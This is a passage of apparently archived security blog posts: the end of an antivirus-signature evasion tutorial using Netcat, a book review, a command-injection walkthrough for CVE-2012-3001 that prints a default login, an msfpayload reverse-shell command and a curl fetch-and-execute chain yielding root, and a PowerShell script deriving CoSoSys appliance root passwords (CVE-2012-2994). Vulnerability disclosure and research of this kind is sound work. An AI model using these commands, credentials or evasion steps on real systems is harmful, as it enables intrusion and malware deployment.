<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqFmYweh0oAHB2Ynf2MPULxUeqEuPySAXBDNp5wybs_zSMgOJ1da73gROsRIJxVHO0xYEpxhzx0ORFsWfAdHuaDj-yD6TsTycLsz9b28d2Pj4D84NVC22FYr4b0wCAcKZrPZD2qASwdqY/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqFmYweh0oAHB2Ynf2MPULxUeqEuPySAXBDNp5wybs_zSMgOJ1da73gROsRIJxVHO0xYEpxhzx0ORFsWfAdHuaDj-yD6TsTycLsz9b28d2Pj4D84NVC22FYr4b0wCAcKZrPZD2qASwdqY/s400/1.png" width="400" /></a></div>
<br />
After the AV product has cleaned the output folder of every file that contains the signature, we are left with a binary containing the bytes from 0 to 10000. We can now assume that the signature exists somewhere between byte 10000 and 20000 since our interval was 10000 bytes and the first binary to be deleted was the one containing bytes up to 20000.<br />
<br />
Now we can continue the process with a smaller interval (1000) and focus on the StartByte (10000) and EndByte (20000) that we discovered in the previous step:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmldNryo4KPHlXvoSUybKtgWwIH7UYQuMQieHWLoulhTx9LgYokqPprU1BtBnyagBP5dR2bycnSrmQRTFLgU2P2OuQ2bXDgzWsIvjYPPKWrYfs_sT_1_AGGonVJs8KgPLgqJOq13k4BsE/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmldNryo4KPHlXvoSUybKtgWwIH7UYQuMQieHWLoulhTx9LgYokqPprU1BtBnyagBP5dR2bycnSrmQRTFLgU2P2OuQ2bXDgzWsIvjYPPKWrYfs_sT_1_AGGonVJs8KgPLgqJOq13k4BsE/s400/2.png" width="400" /></a></div>
<br />
Again, we let the AV product detect and delete the offending binaries and see what we are left with. The interval should progressively get smaller and in this case is down to 100:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmEHs64taLzftUWlfAQ55pqJkujLaKihFEoROf-3CiHcWhVSZVRu9IUC77qGL2gHb_BvFdGnfPgc8PkhAlm80F1zKkEy2BgRYVj1esdSsZdtPy9vxa8yrGX-tHz8zPlpd7bhI5B0nAsN0/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmEHs64taLzftUWlfAQ55pqJkujLaKihFEoROf-3CiHcWhVSZVRu9IUC77qGL2gHb_BvFdGnfPgc8PkhAlm80F1zKkEy2BgRYVj1esdSsZdtPy9vxa8yrGX-tHz8zPlpd7bhI5B0nAsN0/s400/3.png" width="400" /></a></div>
<br />
The next interval is 10:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEim_l7mMP4yIMFMI9ymf9C3QzjhZOTkK5Ndox_xzP2DcnhPpeBdmhF9VM1TV5hhHbP0wbLnyBr6BQZvrElxJ18uojLx4uu18vS1IC4AfkNwRDjyjwsEVMgzGbkqRc7OSCw14SdP9dQxvWU/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEim_l7mMP4yIMFMI9ymf9C3QzjhZOTkK5Ndox_xzP2DcnhPpeBdmhF9VM1TV5hhHbP0wbLnyBr6BQZvrElxJ18uojLx4uu18vS1IC4AfkNwRDjyjwsEVMgzGbkqRc7OSCw14SdP9dQxvWU/s400/4.png" width="400" /></a></div>
<br />
Finally, we can use a byte interval of 1 to see if the signature is flagging on a single byte in the binary:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDNxiOVq6WzLekMz-1FGJpHXuDp-9eEh0P2i4UH2lw2ksVaDEfMBCnErmk2gKjz_3pp1-AIB_3Er8RFxVDGt_R9ZLbUaBdP_77HVWFcyMBu3lHAlBdbDFimgwZcHnFODobrOTvwA3A260/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDNxiOVq6WzLekMz-1FGJpHXuDp-9eEh0P2i4UH2lw2ksVaDEfMBCnErmk2gKjz_3pp1-AIB_3Er8RFxVDGt_R9ZLbUaBdP_77HVWFcyMBu3lHAlBdbDFimgwZcHnFODobrOTvwA3A260/s400/5.png" width="400" /></a></div>
<br />
It appears that we have found the offending byte by allowing Symantec to delete everything containing it. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9CdIvWhKaJqssd-g_bbgXEIqpPsYXeqd1UGcvH5Q1mLATou0cQFyG7KZ0v4DJPLMFuZW3t3wRngavXlC80aRIG401Tf6KY8CO0aKv4p0I1TQyAu2I1DLrxcCIXRbIxTdM6ptOyuz8IPc/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="271" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9CdIvWhKaJqssd-g_bbgXEIqpPsYXeqd1UGcvH5Q1mLATou0cQFyG7KZ0v4DJPLMFuZW3t3wRngavXlC80aRIG401Tf6KY8CO0aKv4p0I1TQyAu2I1DLrxcCIXRbIxTdM6ptOyuz8IPc/s400/6.png" width="400" /></a></div>
<br />
The last byte that was deleted is what needs to be changed in order for the signature to not match. We can now use your favorite hex editor (or PowerShell) to modify the byte to something that won't disrupt the application. It is typical for AV vendors to flag on error messages, copyright notices or other strings which don't affect the executable if modified. Other times, you may need to reverse engineer the binary or use trial-and-error to find a character that will work.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXlq5h2OY0hJGvTn2ahSjRan9e5XlNvFn65iTR6dRB3HCkQHLDr_4beyYFazOvkx-zLedUmXZlQVAczPyRH6uQEM3XgdENrhwfwIF7HEETy6tzdnGSgD4v3hECxxajqWHhEXSIarAqbgA/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="361" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXlq5h2OY0hJGvTn2ahSjRan9e5XlNvFn65iTR6dRB3HCkQHLDr_4beyYFazOvkx-zLedUmXZlQVAczPyRH6uQEM3XgdENrhwfwIF7HEETy6tzdnGSgD4v3hECxxajqWHhEXSIarAqbgA/s400/7.png" width="400" /></a></div>
<br />
The final step is to test the new binary to ensure that it doesn't flag AV and operates as intended. If it does flag, then it could be possible to repeat the entire process. Some signatures may flag on bytes that would cause the application to not function, in which case you would have to utilize a different method. However, in our example Netcat functions perfectly and doesn't flag AV:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDlcvkLNbfeuaXrO3DZu-Y6HybgUt43y_pETuAljooPq-Rffkuddg8EoxYqSNRfdzwD9cSLDTNXWn8iH_SOa7EAAsYbGCkx13KrTJ7wlbacDN6OpaE7cCGXiGxfmPXrY2ZhRHGNdWuP0A/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDlcvkLNbfeuaXrO3DZu-Y6HybgUt43y_pETuAljooPq-Rffkuddg8EoxYqSNRfdzwD9cSLDTNXWn8iH_SOa7EAAsYbGCkx13KrTJ7wlbacDN6OpaE7cCGXiGxfmPXrY2ZhRHGNdWuP0A/s400/8.png" width="400" /></a></div>
<br />
Signature-based products will always struggle with this and similar problems and shouldn't be completely relied upon for security. It should be obvious that this entire process could be automated, but I leave that as an exercise to the reader. As always, utilize this information responsibly and ethically. If you have any questions please let me know. Find-AVSignature has been added to the <a href="https://github.com/mattifestation/PowerSploit">PowerSploit</a> project!<br />
<br />
-ChrisChrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com2tag:blogger.com,1999:blog-8453453300736107961.post-2687918411592268382012-11-30T17:48:00.000-05:002014-11-30T12:45:14.478-05:00"Violent Python" Review<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.amazon.com/gp/product/1597499579/ref=as_li_tl?ie=UTF8&camp=1789&creative=390957&creativeASIN=1597499579&linkCode=as2&tag=smadumstu-20&linkId=HLTZLK24EHTIUV5M" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://ws-na.amazon-adsystem.com/widgets/q?_encoding=UTF8&ASIN=1597499579&Format=_SL250_&ID=AsinImage&MarketPlace=US&ServiceVersion=20070822&WS=1&tag=smadumstu-20" /></a></div>
<img alt="" border="0" src="http://ir-na.amazon-adsystem.com/e/ir?t=smadumstu-20&l=as2&o=1&a=1597499579" height="1" style="border: none !important; margin: 0px !important;" width="1" />
<br />
<br />
The amount of effort that goes into writing any book is substantial, but the amount of effort that goes into a great book is mind-boggling. "<a href="http://www.amazon.com/gp/product/1597499579/ref=as_li_tl?ie=UTF8&camp=1789&creative=390957&creativeASIN=1597499579&linkCode=as2&tag=smadumstu-20&linkId=OXFUWIDGZUM7EQIC">Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers, and Security Engineers</a>" by TJ O'Connor is a great book. Despite the "cookbook" title, this book is well-organized and can be read cover-to-cover. If you are a security professional, you have already or will use the methods mentioned in the book.<br />
<br />
The first chapter dives right into the basics of scripting and the Python scripting language which is probably the slowest part of the entire book. I imagine that the majority of readers will be comfortable with skipping the whole first chapter - but don't. The magic of the book is in how TJ preps most of the scripts and functions with a story which adds context to the effort of writing the script. I don't think I have ever seen that before and it's awesome. It almost prevents you from treating the book as a "cookbook" and only looking for "recipes" that are relevant to you. Instead, you have a scenario where that method or function was important. The reader is never left wondering "who would ever use that?" I hope more authors follow the model created by this book. <br />
<br />
I don't have any major complaints about the content of the book, but there should probably be more discussion about the short-comings of relying on external libraries. Modules and libraries make Python fast, flexible and powerful for most security professionals. However, penetration testers may find themselves on a remote box with Python already installed. In that common scenario, its important to be able to accomplish similar tasks without having to download any external code.<br />
<br />
There are two things that I hope the author and publisher do to further improve the book (and any other future books). First, I would love to this book implement syntax highlighting. I know color print would be more expensive, so maybe release a special edition. I would gladly pay more money to see code in color! The second thing I am anxious for is the ebook release. It's a new book, so I am sure it won't be long - but color should be an easy edition to kindle edition and I will always have access to the book that way.<br />
<br />
Overall, it's my favorite book of the year and I will certainly be referencing it in the future. It will be added to the<a href="http://obscuresecurity.blogspot.com/p/recommended-reading-list.html"> recommended books</a> page shortly and I really hope you pick up a copy and see how Python can make your life easier.<br />
<br />
-ChrisChrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com0tag:blogger.com,1999:blog-8453453300736107961.post-42423584153603899122012-10-31T18:16:00.000-04:002013-03-24T22:27:54.979-04:00Mutiny Command Injection and CVE-2012-3001As with the <a href="http://www.obscuresecurity.blogspot.com/2012/09/cososys-predicable-password-cve-2012.html">last post</a>, this post is further explanation of things that I briefly covered at <a href="http://www.obscuresecurity.blogspot.com/2012/07/blackhat-bsideslv-and-defcon.html">BsidesLV</a> earlier this year. The disclosure process is still ongoing and slow for some things, but the <a href="https://forms.cert.org/VulReport/">U.S. CERT</a> has been extremely helpful. They definitely get better results than I did with any of the vendors and they recently disclosed <a href="http://www.kb.cert.org/vuls/id/841851">CVE-2012-3001</a>. <br />
<br />
Mutiny Technologies network monitoring appliance is vulnerable to multiple command injection vulnerabilities once authenticated to the web application. The default username is 'admin' and the default password is 'mutiny'. Even if those were changed, there are simple ways to guess the password for the 'admin' account which I talked about in a <a href="http://www.obscuresecurity.blogspot.com/2012/04/command-injection-to-code-execution.html">previous post</a> about command injection vulnerabilities. When connecting to the appliance over HTTP you are presented with something like:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjveH0_OdAWBcTuXdRWUMHv9HrgRTb_g4Da5jfjsa1wy2IIugg0ZpD2WZ5UpCWEhpSi4koPI8nBJzmnpgc8N8vj5jM9seR8J6ahRfgq8y3UCv3R2cvCTEh6DR6UH-ChQCquJZVEJ28DYg/s1600/linux_munity.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjveH0_OdAWBcTuXdRWUMHv9HrgRTb_g4Da5jfjsa1wy2IIugg0ZpD2WZ5UpCWEhpSi4koPI8nBJzmnpgc8N8vj5jM9seR8J6ahRfgq8y3UCv3R2cvCTEh6DR6UH-ChQCquJZVEJ28DYg/s400/linux_munity.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
The vendor has already added a nice message reminding people to upgrade and even referenced some "<a href="http://www.mutiny.com/releasehistory.php?ReleaseID=335">linux vulnerability issues</a>" which would be an interesting way of describing command injection vulnerabilities in their web application. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
In this example, we will log in with the admin account. Once logged in, we can navigate to the "admin" tab located on the top right.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOIme2v4MfopZT6AP9LwYU6rivdUJQl20WGwmbh4isf4LNAQG5__f00orEEEBTIuferLXfogL_C8tIhxniUiGsSYiIYhYVOt53LmuhFLyJGyj8lRoGndrQN0Z8qSB4IlIij3QXaUAS4Ds/s1600/admin_tab.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="41" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOIme2v4MfopZT6AP9LwYU6rivdUJQl20WGwmbh4isf4LNAQG5__f00orEEEBTIuferLXfogL_C8tIhxniUiGsSYiIYhYVOt53LmuhFLyJGyj8lRoGndrQN0Z8qSB4IlIij3QXaUAS4Ds/s400/admin_tab.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Next we will go to the "Network Configuration" tab and focus on the "Subnet Mask" field.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOnJlWgZYFJ0MG8-rmI9mZw19w1-y1h_fzBFEbWhN9gfel9RPZcCZJjJ7LWgyZfdU_2HaHdNFt-Az8Q6bGx3pqN8ASot-kwdekh3-Wv7r38bOQOZ9ON_BPVhqOko048RFW-VQCF8oulOA/s1600/network.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOnJlWgZYFJ0MG8-rmI9mZw19w1-y1h_fzBFEbWhN9gfel9RPZcCZJjJ7LWgyZfdU_2HaHdNFt-Az8Q6bGx3pqN8ASot-kwdekh3-Wv7r38bOQOZ9ON_BPVhqOko048RFW-VQCF8oulOA/s400/network.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
To confirm that command injection is possible, lets test by pinging our own address.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtqS10_8A0w5OLT1EUc0W0JIDYOPdhWy7b6POemz1E_i_EmV5iOHKqA5G2Xp0h1LNojVtPLt0KdchbcBwJaRb5F7haU-JapwIVvl6LJWqYAuSaAfVe5lTjulOaCO6Ldse9BX9MvzPtmuk/s1600/cmd_injection.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtqS10_8A0w5OLT1EUc0W0JIDYOPdhWy7b6POemz1E_i_EmV5iOHKqA5G2Xp0h1LNojVtPLt0KdchbcBwJaRb5F7haU-JapwIVvl6LJWqYAuSaAfVe5lTjulOaCO6Ldse9BX9MvzPtmuk/s400/cmd_injection.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Success! Lets take a look at how the post is formed when changes are made to the network configuration. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5XHNUmrbnbAR1ddh5-FTZ7Y8XBYtlhBV2WKLOoVb9Fgu7lUIsOIu2Y2Veir9n7ATP4STh1EsqMeGmQpho2OpPPlR135N6Qn8QLmV8IWGWgfrZzJgMg5UD7mrXG-A5tlPckczrCkyWxVQ/s1600/mutiny_updatepost.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5XHNUmrbnbAR1ddh5-FTZ7Y8XBYtlhBV2WKLOoVb9Fgu7lUIsOIu2Y2Veir9n7ATP4STh1EsqMeGmQpho2OpPPlR135N6Qn8QLmV8IWGWgfrZzJgMg5UD7mrXG-A5tlPckczrCkyWxVQ/s400/mutiny_updatepost.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Although the Mutiny appliance ships with a disabled firewall and SSH enabled, lets assume that the attacker has discovered this vulnerability externally or is pivoting through another compromised host. Lets generate a Meterpreter reverse TCP binary, put it on our webserver and put up a listener.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.14 LPORT=8443 R | msfencode -t elf > update</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpAaClv8-f0VLDMCJjW2K30VEx6TcqQT8Wg1BjiA6H4Lx1Pg55NEWScZ_GaDSLYW9ci-b2Ne30QE2s8JdaBEi7l1udrZ6iRNm28Eb2n-I1sK7ci9tYSD4fDFFn8glWl-2nYNJY8J8e82E/s1600/listener.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="315" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpAaClv8-f0VLDMCJjW2K30VEx6TcqQT8Wg1BjiA6H4Lx1Pg55NEWScZ_GaDSLYW9ci-b2Ne30QE2s8JdaBEi7l1udrZ6iRNm28Eb2n-I1sK7ci9tYSD4fDFFn8glWl-2nYNJY8J8e82E/s400/listener.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
Next, we will have to see what is available on the appliance to download our binary. Unfortunately, wget isn't installed or isn't in the path since all we can tell is that it isn't working. However, Curl is installed so we can download our binary, change the permissions and execute it from the web interface.<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
curl -o /tmp/update http://192.168.1.15/update</div>
<div class="separator" style="clear: both; text-align: left;">
chmod +x /tmp/update</div>
<div class="separator" style="clear: both; text-align: left;">
/tmp/update</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixRuXxjMXcRQOE4NP6AhQY2-7lOSjCW4rqdBu4hwuTzXiLAd6MA65k8zj4sLVO5CBL_n-IM72dpcgF6QyQCaan-d4m-j3HHm5ZgALdxOV0rcNnKAKsLHQzpcZOd20NyOzlEBrk9evcy9E/s1600/mutiny_updatedownloadcurl.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="80" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixRuXxjMXcRQOE4NP6AhQY2-7lOSjCW4rqdBu4hwuTzXiLAd6MA65k8zj4sLVO5CBL_n-IM72dpcgF6QyQCaan-d4m-j3HHm5ZgALdxOV0rcNnKAKsLHQzpcZOd20NyOzlEBrk9evcy9E/s400/mutiny_updatedownloadcurl.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Now our binary has executed and we have our shell. What context is the web application running as?</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiL0sRFuaN5WWFDjSNboIcWVzCww7jARUXUPhz2qDbjEoabf9Nib6QGBEnwpQDg2JXskO5HLtDLm7fGfIQsOA6obBM4z8iXAdXaAsvjug4WOQXX08tr6CI480NTk1hP27Uyn3qXP4nwI5c/s1600/root.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiL0sRFuaN5WWFDjSNboIcWVzCww7jARUXUPhz2qDbjEoabf9Nib6QGBEnwpQDg2JXskO5HLtDLm7fGfIQsOA6obBM4z8iXAdXaAsvjug4WOQXX08tr6CI480NTk1hP27Uyn3qXP4nwI5c/s400/root.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Root.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Please let me know if you have any questions, thanks for reading and sorry about the lack of PowerShell!</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
-Chris</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
***Update 3/24/13</div>
<div class="separator" style="clear: both; text-align: left;">
Juan Vazquez wrote a <a href="https://github.com/rapid7/metasploit-framework/pull/1557">Metasploit module</a> to exploit this vulnerability. Check it out!</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Chrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com0tag:blogger.com,1999:blog-8453453300736107961.post-47421641046555672482012-09-26T23:40:00.000-04:002012-09-27T09:32:36.582-04:00CoSoSys Predicable Password CVE-2012-2994<a href="http://www.kb.cert.org/vuls/id/591667">CVE-2012-2994</a> describes a vulnerability in the CoSoSys Endpoint Protector 4 appliance that I mentioned in my<a href="http://obscuresecurity.blogspot.com/2012/07/blackhat-bsideslv-and-defcon.html"> BsidesLV talk</a>. The bottom-line is that once the appliance is activated, a script is ran that sets several passwords using a variation of the serial number. The account "epproot" is a root-equivalent account and can be used to SSH into the appliance. The password is not provided from the company so if you would like to control the appliance, use the following PowerShell script:<br />
<br />
<b>Get-EPPPassword Function</b><textarea cols="60" name="Get-HttpStatus" readonly="readonly" rows="50" wrap="off">function Get-EPPPassword {
<#
.Synopsis
Get-EPPPassword calculates the predictable root password for Cososys Endpoint Protector 4 servers.
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
.Description
Get-EPPPassword Timeline:
discovered 3 Mar 2012
reported to vendor 12 Jun 2012
reported to US-CERT 15 Jul 2012
released 17 Sep 2012
.Example
Get-EPPPassword -Serial 123456789
.Link
http://obscuresecurity.blogspot.com/2012/09/cososys-predicable-password-cve-2012.html
#>
Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $Serial)
#function to calculate sums from serial number
function GetSerialSum {
if ($Serial.Length -ne 9) {
Return "EPP Serial Number is 9 digits"
}
else {
#convert $serial to an array of integers
[int[]] $SerialArray = [char[]]$Serial| ForEach-Object {[int]"$_"}
}
foreach ($Number in $SerialArray) {
$Sum += $Number
}
Write-Output $Sum
}
#function to calculate epproot password
function GetPassword {
Write-Output "eroot!00$Sums`RO"
}
$Sums = GetSerialSum
GetPassword
}
Get-EPPPassword -Serial 135792468</textarea><br />
<br />
The vulnerability lies in the fact that there are an extremely limited number of possible password combinations (91) which can be easily brute-forced. To generate the complete list of possible passwords with PowerShell:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtV0lNkAh1kKV8nzIj4_70e52FXSEYbmA5CP6PKx7tI_kMaxfUSWpTlwjA9Ak7D7V8XhtMWojZcqlzIgyT-JdnXIy01MsJ4GemvzmvUlcy-mZ-X9v6zAUVHlNebeDsYW0nVvJm-L6O01I/s1600/gen1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="251" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtV0lNkAh1kKV8nzIj4_70e52FXSEYbmA5CP6PKx7tI_kMaxfUSWpTlwjA9Ak7D7V8XhtMWojZcqlzIgyT-JdnXIy01MsJ4GemvzmvUlcy-mZ-X9v6zAUVHlNebeDsYW0nVvJm-L6O01I/s400/gen1.png" width="400" /></a></div>
<br />
The output should look like the following screenshot, but can be downloaded <a href="http://pastebin.com/2cJdWRVM">here</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkGDJmXnH5TMICoVzOPvUEIJCvx0qROaGcqjNKNTbHGvn8S8sZZn3iBPQWFSZbyKvYIDwLhSy9yVijMUO3oqG28NCRB5G0k4OO7IUem2Qp-6P137btkoXL6c-wWcBdSXHP2rfAVUKB-7Y/s1600/gen2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkGDJmXnH5TMICoVzOPvUEIJCvx0qROaGcqjNKNTbHGvn8S8sZZn3iBPQWFSZbyKvYIDwLhSy9yVijMUO3oqG28NCRB5G0k4OO7IUem2Qp-6P137btkoXL6c-wWcBdSXHP2rfAVUKB-7Y/s400/gen2.png" width="283" /></a></div>
<br />
<br />
Thanks for reading and I hope to see everyone at Derbycon!<br />
<br />
-ChrisChrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com0tag:blogger.com,1999:blog-8453453300736107961.post-11350122761171779952012-08-15T11:02:00.001-04:002012-08-15T11:05:59.886-04:00Scanning SharePoint with PowerShellA few months ago, I published <a href="http://www.obscuresecurity.blogspot.com/2012/06/vetting-devices-with-powershell-and-cve.html">Get-HttpStatus</a> - a PowerShell function that aides in generic directory and file fuzzing. In order to get it added to <a href="https://github.com/mattifestation/PowerSploit/">PowerSploit</a>, Matt suggested several improvements and eventually made a few of his own. The function supports SSL and includes several <a href="https://github.com/mattifestation/PowerSploit/tree/master/Recon/Dictionaries">dictionaries</a> derived from other projects such as <a href="http://cirt.net/nikto2/">Nikto</a>, <a href="http://sourceforge.net/projects/yokoso/files/yokoso-0.1/">Yokoso</a> and <a href="http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/">SharepointURLbrute</a>. Without dictionaries, the function is pretty useless so a big thanks goes out to the developers of each of those tools and the hard work that went into creating the file and directory dictionaries. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Lets take a look at one specific use-case for <a href="https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-HttpStatus.ps1">Get-HttpStatus</a> - scanning a SharePoint installation. We can start by opening PowerShell and copying and pasting the function into the shell.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6Br6Jedozmh_bFi5OSrnKBDPOEFi0cw1CGIBF9Z3BH1hSEevrUnGKiFRaJIPpWTQ_aisep5vRiAM0SzMkYESEDoKHisBIgmXW0h52Q3g0wK2XjBBNvdDEL5hGs4OKWU-m-7AYpZ9bRY4/s1600/scan_help.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6Br6Jedozmh_bFi5OSrnKBDPOEFi0cw1CGIBF9Z3BH1hSEevrUnGKiFRaJIPpWTQ_aisep5vRiAM0SzMkYESEDoKHisBIgmXW0h52Q3g0wK2XjBBNvdDEL5hGs4OKWU-m-7AYpZ9bRY4/s400/scan_help.PNG" width="400" /></a></div>
<br />
Next we provide the function a target website and the path to the dictionary file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
